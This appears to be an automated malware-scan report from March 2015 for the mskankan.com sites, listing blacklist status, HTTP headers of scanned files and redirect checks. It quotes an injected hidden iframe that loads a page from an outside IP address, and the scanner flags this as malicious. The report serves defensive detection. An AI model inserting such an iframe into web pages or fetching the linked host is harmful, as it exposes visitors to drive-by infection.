Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xz.mskankan.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://xz.mskankan.com/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://xz.mskankan.com/test404page.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:49:53 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Location: http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/test404page.js Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/test404page.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:49:55 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://www.mskankan.com/ | 200 OK Content-Length: 41618 Content-Type: text/html | malicious |
Page code contains blacklisted domain: 222.186.34.11 <iframe src=http://222.186.34.11:21999/index.htm width=123 height=1></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <title>Öйú¸ßÇåÃÅ»§_×îеçÓ°ÏÂÔØ-ÂóÉп´¿´Íø</title> <META name="keywords" content="×îеçÓ°Ï ...[4289 bytes skipped]... Malicious iFrame found. size: 123x1 src: http://222.186.34.11:21999/index.htm This URL is marked by Yandex as suspicious <iframe src=http://222.186.34.11:21999/index.htm width=123 height=1> | ||
http://www.mskankan.com/skin/Default/images/Conn.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:07 GMT Accept-Ranges: bytes ETag: "686fb16fdcbcd1:24a6" Server: IIS Content-Length: 6543 Content-Location: http://www.mskankan.com/skin/Default/images/Conn.js Content-Type: application/x-javascript Last-Modified: Mon, 26 Nov 2012 17:40:12 GMT X-Powered-By: WAF/2.0 | clean |
http://www.mskankan.com/skin/default/images/conn.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:08 GMT Accept-Ranges: bytes ETag: "686fb16fdcbcd1:24a6" Server: IIS Content-Length: 6543 Content-Location: http://www.mskankan.com/skin/default/images/conn.js Content-Type: application/x-javascript Last-Modified: Mon, 26 Nov 2012 17:40:12 GMT X-Powered-By: WAF/2.0 | clean |
http://www.mskankan.com/test404page.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:08 GMT Accept-Ranges: bytes ETag: "2a70fa4f8ec9cf1:24a6" Server: IIS Content-Length: 382 Content-Location: http://www.mskankan.com/404.html?404;http://www.mskankan.com:80/test404page.js Content-Type: text/html Last-Modified: Sat, 06 Sep 2014 04:52:08 GMT Set-Cookie: safedog-flow-item=A5737D17470F6542810B6FB7AC2EF688; expires=Wen, 7-Arp-2151 19:01:24 GMT; domain=mskankan.com; path=/ X-Powered-By: WAF/2.0 | clean |
http://www.mskankan.com/404.html?404;http://www.mskankan.com:80/test404page.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:09 GMT Accept-Ranges: bytes ETag: "2a70fa4f8ec9cf1:24a6" Server: IIS Content-Length: 382 Content-Location: http://www.mskankan.com/404.html?404;http://www.mskankan.com:80/test404page.js Content-Type: text/html Last-Modified: Sat, 06 Sep 2014 04:52:08 GMT Set-Cookie: safedog-flow-item=A5737D17470F6542810B6FB7AC2EF688; expires=Wen, 7-Arp-2151 19:01:25 GMT; domain=mskankan.com; path=/ X-Powered-By: WAF/2.0 | clean |
http://xz.mskankan.com/Include/javascript/Funciton.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:03 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Location: http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/Include/javascript/Funciton.js Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/include/javascript/funciton.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:05 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/skin/Default/images/Changimages.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:05 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Location: http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/skin/Default/images/Changimages.js Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/skin/default/images/changimages.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:05 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/Advertising/2.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:06 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Location: http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/Advertising/2.js Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/advertising/2.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:09 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://js.users.51.la/4739293.js | 200 OK Content-Length: 1977 Content-Type: application/x-javascript | clean |
http://xz.mskankan.com/skin/Default/images/HiboCms.Img.Load.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:10 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Location: http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/skin/Default/images/HiboCms.Img.Load.js Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/skin/default/images/hibocms.img.load.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:10 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/Advertising/10.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:10 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Location: http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/Advertising/10.js Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
http://xz.mskankan.com/404.html?404;http://xz.mskankan.com:80/advertising/10.js | HTTP/1.1 200 OK Date: Sun, 01 Mar 2015 15:50:12 GMT Accept-Ranges: bytes ETag: "091a8e2553cf1:f48" Server: Microsoft-IIS/6.0 Content-Length: 537 Content-Type: text/html Last-Modified: Tue, 08 Apr 2014 12:24:58 GMT X-Powered-By: ASP.NET | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xz.mskankan.com
Result:
HTTP/1.1 500 timeout
Content-Type: text/plain
GET / HTTP/1.1
Host: xz.mskankan.com
Result:
HTTP/1.1 500 timeout
Content-Type: text/plain
Second query (visit from search engine):
GET / HTTP/1.1
Host: xz.mskankan.com
Referer: http://www.google.com/search?q=xz.mskankan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xz.mskankan.com
Referer: http://www.google.com/search?q=xz.mskankan.com
Result:
The result is similar to the first query. There are no suspicious redirects found.